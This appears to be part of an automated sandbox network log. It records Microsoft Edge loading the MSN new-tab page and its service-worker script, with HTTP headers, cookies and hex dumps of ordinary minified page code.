                                                                                                                                                                                                                                                                          Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC8412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Length: 53379
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Set-Cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly
                                                                                                                                                                                                                                                                          Set-Cookie: _C_Auth=
                                                                                                                                                                                                                                                                          Set-Cookie: sptmarket_restored=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
                                                                                                                                                                                                                                                                          Set-Cookie: USRLOC=; expires=Sat, 09 Jan 2027 13:55:47 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly
                                                                                                                                                                                                                                                                          Set-Cookie: _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; domain=.msn.com; path=/; httponly
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: HEAD,GET,OPTIONS
                                                                                                                                                                                                                                                                          Content-Security-Policy: child-src 'self';connect-src 'self' *.mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://*.sharepoint.com/_api/v2.0/ https://*.sharepoint-df.com/_api/v2.0/ https://*.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://pet [TRUNCATED]
                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=Edge;chrome=1
                                                                                                                                                                                                                                                                          x-fabric-cluster: pmeprodeus
                                                                                                                                                                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]}
                                                                                                                                                                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=1209600; includeSubDomains; preload
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR
                                                                                                                                                                                                                                                                          X-Ceto-ref: 677fd56391374a508837e2bc9ec5e487|AFD:9EF29122716B4FF4973CE09148CE2062|2025-01-09T13:55:47.088Z
                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 9EF29122716B4FF4973CE09148CE2062 Ref B: BL2AA2030104019 Ref C: 2025-01-09T13:55:47Z
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC9INData Raw: 3c 21 44 4f 43 54 59 50 45
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC689INData Raw: 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 64 69 72 3d 22 6c 74 72 22 20 3e 0d 0a 3c 68 65 61 64 20 64 61 74 61 2d 69 6e 66 6f 3d 22 66 3a 6d 73 6e 61 6c 6c 65 78 70 75 73 65 72 73 2c 70 72 67 2d 73 70 2d 6c 69 76 65 61 70 69 2c 70 72 67 2d 66 69 6e 2d 63 6f 6d 70 6f 66 2c 70 72 67 2d 66 69 6e 2d 68 70 6f 66 6c 69 6f 2c 70 72 67 2d 66 69 6e 2d 70 6f 66 6c 69 6f 2c 70 72 67 2d 31 73 77 2d 63 63 2d 63 61 6c 66 65 65 64 69 63 2c 70 72 67 2d 6d 73 6e 2d 67 6c 73 62 69 64 6d 2c 31 73 2d 70 6e 70 66 65 64 6c 6f 63 2c 70 6e 70 77 78 65 78 70 69 72 65 31 38 30 2c 62 69 6e 67 5f 76 32 5f 73 63 6f 70 65 2c 70 72 67 2d 31 73 77 2d 73 61 2d 67 65 6e 75 32 69 76 33 74 33 2c 70 72 67 2d 31 73 77 2d 73 61 2d 73 70 37 2d 74 63 63 2c
                                                                                                                                                                                                                                                                          Data Ascii: html><html lang="en-us" dir="ltr" ><head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-1sw-cc-calfeedic,prg-msn-glsbidm,1s-pnpfedloc,pnpwxexpire180,bing_v2_scope,prg-1sw-sa-genu2iv3t3,prg-1sw-sa-sp7-tcc,
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC436INData Raw: 76 6c 63 67 64 64 6e 2c 31 73 2d 77 70 6f 2d 70 72 67 32 2d 65 76 6c 63 74 33 2c 70 72 67 2d 31 73 77 2d 62 67 2d 70 32 2c 70 72 67 2d 31 73 77 2d 63 6d 65 76 6c 74 2c 70 72 67 2d 70 32 2d 74 66 2d 62 64 67 70 76 2d 61 69 2c 70 72 67 2d 70 72 32 2d 66 69 65 70 6c 63 2c 70 72 67 2d 70 72 32 2d 74 72 66 2d 72 68 69 67 68 69 6d 70 2c 70 72 67 2d 70 72 32 2d 77 78 65 76 6f 6c 6e 6f 74 69 2c 70 72 67 2d 75 70 73 61 69 70 2d 77 31 2d 74 2c 31 73 2d 72 70 73 73 65 63 61 75 74 68 74 2c 6a 6a 5f 66 61 63 5f 74 2c 63 68 61 74 6e 5f 76 32 5f 74 32 2c 70 72 67 2d 70 72 31 2d 31 63 61 73 68 62 61 63 6b 2d 74 2c 70 72 67 2d 31 63 61 73 68 62 61 63 6b 2d 72 6d 2d 63 61 72 2c 31 73 2d 77 70 6f 2d 70 72 31 2d 73 74 61 67 67 65 72 6e 65 77 73 2c 31 73 2d 77 70 6f 2d 70 72
                                                                                                                                                                                                                                                                          Data Ascii: vlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_t,chatn_v2_t2,prg-pr1-1cashback-t,prg-1cashback-rm-car,1s-wpo-pr1-staggernews,1s-wpo-pr
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 2d 64 65 61 6c 73 64 61 79 70 64 70 2c 70 72 67 2d 73 68 2d 72 6d 69 74 6d 6c 6e 6b 2c 6e 6f 70 69 6e 67 6c 61 6e 63 65 63 61 72 64 69 74 2c 70 72 67 2d 63 67 2d 69 6e 67 61 6d 65 73 2d 63 74 2c 70 72 67 2d 31 73 2d 77 6f 72 6b 69 64 2c 70 72 67 2d 31 73 77 2d 77 78 68 61 69 6c 2c 6e 6f 6e 6d 6f 62 69 6c 65 2d 63 2c 31 73 2d 74 65 6d 70 2d 77 69 64 2d 74 2c 70 72 67 2d 31 73 2d 74 77 69 64 2c 61 64 73 2d 6e 6f 70 6f 73 74 73 71 2d 74 2c 61 64 73 2d 6e 6f 70 6f 73 74 73 71 2c 31 73 2d 75 61 73 64 69 73 66 2d 74 2c 61 64 73 2d 61 6e 6a 73 6f 6e 2d 6d 69 67 74 2c 73 68 2d 62 64 76 69 64 2c 70 72 67 2d 73 68 2d 62 64 2d 76 69 64 65 6f 2c 61 64 73 2d 6e 6f 6f 75 74 62 72 61 69 6e 2c 72 65 6c 65 61 73 65 2d 6f 75 74 6c 6f 6f 6b 2d 61 70 70 2c 61 64 73 2d 70 72
                                                                                                                                                                                                                                                                          Data Ascii: -dealsdaypdp,prg-sh-rmitmlnk,nopinglancecardit,prg-cg-ingames-ct,prg-1s-workid,prg-1sw-wxhail,nonmobile-c,1s-temp-wid-t,prg-1s-twid,ads-nopostsq-t,ads-nopostsq,1s-uasdisf-t,ads-anjson-migt,sh-bdvid,prg-sh-bd-video,ads-nooutbrain,release-outlook-app,ads-pr
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 67 65 6f 5f 63 6f 75 6e 74 72 79 6e 61 6d 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 6e 69 74 65 64 20 53 74 61 74 65 73 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 67 65 6f 5f 73 75 62 64 69 76 69 73 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 4e 65 77 20 59 6f 72 6b 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 67 65 6f 5f 7a 69 70 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 31 30 30 30 31 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 67 65 6f 5f 63 69 74 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 4e 65 77 20 59 6f 72 6b 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 67 65 6f 5f 6c 61 74 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 34 30 2e 37 34 38 33 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 67 65 6f 5f 6c 6f 6e 67 26 71 75 6f 74
                                                                                                                                                                                                                                                                          Data Ascii: &quot;, &quot;geo_countryname&quot;:&quot;United States&quot;, &quot;geo_subdivision&quot;:&quot;New York&quot;, &quot;geo_zip&quot;:&quot;10001&quot;, &quot;geo_city&quot;:&quot;New York&quot;, &quot;geo_lat&quot;:&quot;40.7483&quot;, &quot;geo_long&quot
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 6e 66 6f 22 29 3b 69 66 28 21 28 74 2e 69 6e 64 65 78 4f 66 28 22 6e 74 70 2d 61 66 64 68 33 74 22 29 3e 3d 30 7c 7c 74 2e 69 6e 64 65 78 4f 66 28 22 6e 74 70 2d 61 66 64 68 33 63 22 29 3e 3d 30 29 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 6e 3d 22 61 66 64 70 72 6f 74 6f 63 6f 6c 3d 22 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 20 22 29 2e 66 69 6e 64 28 28 65 3d 3e 30 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 6e 29 29 29 3b 69 66 28 6f 29 7b 63 6f 6e 73 74 20 74 3d 6f 2e 73 70 6c 69 74
                                                                                                                                                                                                                                                                          Data Ascii: ned"==typeof document)return e;const t=document.head.getAttribute("data-info");if(!(t.indexOf("ntp-afdh3t")>=0||t.indexOf("ntp-afdh3c")>=0))return e;const n="afdprotocol=";var o=document.cookie.split("; ").find((e=>0===e.indexOf(n)));if(o){const t=o.split
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 62 72 6f 77 73 65 72 2e 65 76 65 6e 74 73 2e 64 61 74 61 2e 6d 73 6e 2e 63 6f 6d 22 3a 22 65 76 65 6e 74 73 2d 73 61 6e 64 62 6f 78 2e 64 61 74 61 2e 6d 73 6e 2e 63 6f 6d 22 3b 72 65 74 75 72 6e 7b 63 6f 72 73 3a 22 74 72 75 65 22 2c 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6a 73 6f 6e 2d 73 74 72 65 61 6d 22 2c 22 63 6c 69 65 6e 74 2d 69 64 22 3a 22 4e 4f 5f 41 55 54 48 22 2c 22 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 32 2e 32 2e 32 22 2c 61 70 69 6b 65 79 3a 69 3f 22 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 2d 39 66 63 35 37 64 33 66 2d 66 64 61 63 2d 34 62 63 66 2d 62 39 32 37 2d 37 35 65 61 66 65 36 30 31
                                                                                                                                                                                                                                                                          Data Ascii: browser.events.data.msn.com":"events-sandbox.data.msn.com";return{cors:"true","content-type":"application/x-json-stream","client-id":"NO_AUTH","client-version":"1DS-Web-JS-2.2.2",apikey:i?"0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe601
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 4b 3d 32 32 33 33 30 30 2c 7a 3d 32 32 33 33 30 31 3b 66 75 6e 63 74 69 6f 6e 20 58 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 6f 28 74 29 3b 69 66 28 6e 29 7b 63 6f 6e 73 74 20 74 3d 6e 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 65 29 2c 6f 3d 74 26 26 74 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 20 74 26 26 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 23 65 72 72 6f 72 22 21 3d 3d 6f 3f 74 3a 28 48 28 22 55 52 4c 20 69 73 20 6e 6f 74 20 74 72 75 73 74 65 64 20 74 79 70 65 73 20 63 6f 6d 70 6c 69 61 6e 74 2e 22 2c 7a 2c 7b 63 75 73 74 6f 6d 4d 65 73 73 61 67 65 3a 22 46 61 69 6c 65 64 20 55 52 4c 20 69 73 3a 20 22 2b 65 7d 2c 42 2e 44 65 70 72 65 63 61 74 65 64 2c 21 30 29 2c 65 29 7d 72 65 74 75 72 6e 20 48 28 22 54 72 75 73 74 65 64 20 74 79
                                                                                                                                                                                                                                                                          Data Ascii: K=223300,z=223301;function X(e,t){const n=o(t);if(n){const t=n.createScriptURL(e),o=t&&t.toString();return t&&"about:blank#error"!==o?t:(H("URL is not trusted types compliant.",z,{customMessage:"Failed URL is: "+e},B.Deprecated,!0),e)}return H("Trusted ty
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 73 6b 62 61 72 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 65 6e 74 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 68 6f 76 65 72 22 2c 22 77 69 6e 70 32 66 70 74 61 73 6b 62 61 72 68 6f 76 65 72 65 6e 74 22 2c 22 77 69 6e 70 32 77 69 64 67 65 74 22 2c 22 77 69 6e 70 32 77 69 64 67 65 74 65 6e 74 22 5d 29 3b 63 6f 6e 73 74 20 41 65 3d 6e 65 77 20 53 65 74 28 5b 22 66 69 6e 61 6e 63 65 2d 61 70 70 2d 77 69 6e 22 2c 22 77 65 61 74 68 65 72 2d 61 70 70 2d 77 69 6e 22 2c 22 77 69 6e 70 73 74 6f 72 65 61 70 70 22 5d 29 2c 4c 65 3d 28 6e 65 77 20 53 65 74 28 5b 22 6d 73 65 64 67 64 68 70 22 2c 22 6d 73 65 64 67 64 68 70 68 64 72 22 2c 22 6d 73 65 64 67 6e 74 70 68 64 72 22 2c 22 6d 73 65 64 67 6e 74 70 22 2c 22 6d 73 65 64 67 64 68 70 22 2c 22 65 6e
                                                                                                                                                                                                                                                                          Data Ascii: skbar","winp2fptaskbarent","winp2fptaskbarhover","winp2fptaskbarhoverent","winp2widget","winp2widgetent"]);const Ae=new Set(["finance-app-win","weather-app-win","winpstoreapp"]),Le=(new Set(["msedgdhp","msedgdhphdr","msedgntphdr","msedgntp","msedgdhp","en
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC4096INData Raw: 28 65 29 7c 7c 7b 7d 2c 7b 62 72 6f 77 73 65 72 54 79 70 65 3a 6e 3d 22 22 7d 3d 74 7c 7c 7b 7d 3b 72 65 74 75 72 6e 21 21 2f 73 61 66 61 72 69 2f 69 2e 74 65 73 74 28 6e 29 7d 28 29 3b 72 65 74 75 72 6e 20 74 7d 29 29 3b 63 6f 6e 73 74 20 69 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6a 65 28 29 3b 72 65 74 75 72 6e 20 65 26 26 22 31 22 3d 3d 3d 65 2e 67 65 74 49 74 65 6d 28 5a 65 29 7d 29 29 3b 63 6f 6e 73 74 20 72 74 3d 78 65 28 29 7c 7c 7b 7d 2c 73 74 3d 7b 6e 65 77 73 41 6e 64 49 6e 74 65 72 65 73 74 73 3a 31 2c 77 69 6e 64 6f 77 73 4e 65 77 73 50 6c 75 73 3a 31 2c 77 69 6e 57 69 64 67 65 74 73 3a 31 2c 77 69 6e 64 6f 77 73 53 68 65 6c 6c 3a 31 2c 77 69 6e 64 6f 77 73 53 68 65 6c 6c 56 32 3a 31 2c 64 69 73 74 72 69 62 75 74 69 6f 6e 3a 31
                                                                                                                                                                                                                                                                          Data Ascii: (e)||{},{browserType:n=""}=t||{};return!!/safari/i.test(n)}();return t}));const it=u((()=>{const e=je();return e&&"1"===e.getItem(Ze)}));const rt=xe()||{},st={newsAndInterests:1,windowsNewsPlus:1,winWidgets:1,windowsShell:1,windowsShellV2:1,distribution:1


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          12192.168.2.849896131.253.33.2034435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC2070OUTGET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ntp.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Service-Worker: script
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":15,"imageId":"BB1msyCI","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: serviceworker
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC1432INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                          Content-MD5: 4h4pmCwrwxZnvMqZGCDn3w==
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 09 Jan 2025 09:19:40 GMT
                                                                                                                                                                                                                                                                          ETag: 0x8DD308EBEEC7E61
                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                          x-ms-request-id: 6cd098bc-f01e-0086-0d77-6296a6000000
                                                                                                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                          Akamai-Request-BC: [a=23.48.200.173,b=665426727,c=g,n=US_VA_ASHBURN,o=20940]
                                                                                                                                                                                                                                                                          Server-Timing: clientrtt; dur=0, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                          Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                          Akamai-Server-IP: 23.48.200.173
                                                                                                                                                                                                                                                                          Akamai-Request-ID: 27a99b27
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Service-Worker-Allowed: /
                                                                                                                                                                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                          Akamai-GRN: 0.adc83017.1736430947.27a99b27
                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 17E159F3234F4CE5B8818DE49686EFA1 Ref B: BL2AA2010203023 Ref C: 2025-01-09T13:55:47Z
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC2808INData Raw: 61 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3b 65 6c 73 65 7b 76 61 72 20 73 3d 74 28 29 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 73 29 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 3a 65 29 5b 6e 5d 3d 73 5b 6e 5d 7d 7d 28 73 65 6c 66 2c 28 28 29 3d 3e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74
                                                                                                                                                                                                                                                                          Data Ascii: af1!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC8200INData Raw: 32 30 30 30 0d 0a 74 65 73 3d 22 65 6e 61 62 6c 65 54 6f 70 69 63 50 75 62 6c 69 73 68 65 72 52 6f 75 74 65 73 22 2c 65 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 52 6f 75 74 69 6e 67 3d 22 65 6e 61 62 6c 65 53 74 61 74 69 63 52 6f 75 74 69 6e 67 22 2c 65 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 4e 61 76 52 6f 75 74 69 6e 67 3d 22 65 6e 61 62 6c 65 53 74 61 74 69 63 4e 61 76 52 6f 75 74 69 6e 67 22 2c 65 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 41 64 73 52 6f 75 74 69 6e 67 3d 22 65 6e 61 62 6c 65 53 74 61 74 69 63 41 64 73 52 6f 75 74 69 6e 67 22 2c 65 2e 63 6f 6d 6d 6f 6e 48 61 73 68 3d 22 63 6f 6d 6d 6f 6e 48 61 73 68 22 2c 65 2e 76 65 6e 64 6f 72 73 48 61 73 68 3d 22 76 65 6e 64 6f 72 73 48 61 73 68 22 2c 65 2e 65 78 70 65 72 69 65 6e 63 65 48 61 73 68 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 2000tes="enableTopicPublisherRoutes",e.enableStaticRouting="enableStaticRouting",e.enableStaticNavRouting="enableStaticNavRouting",e.enableStaticAdsRouting="enableStaticAdsRouting",e.commonHash="commonHash",e.vendorsHash="vendorsHash",e.experienceHash="
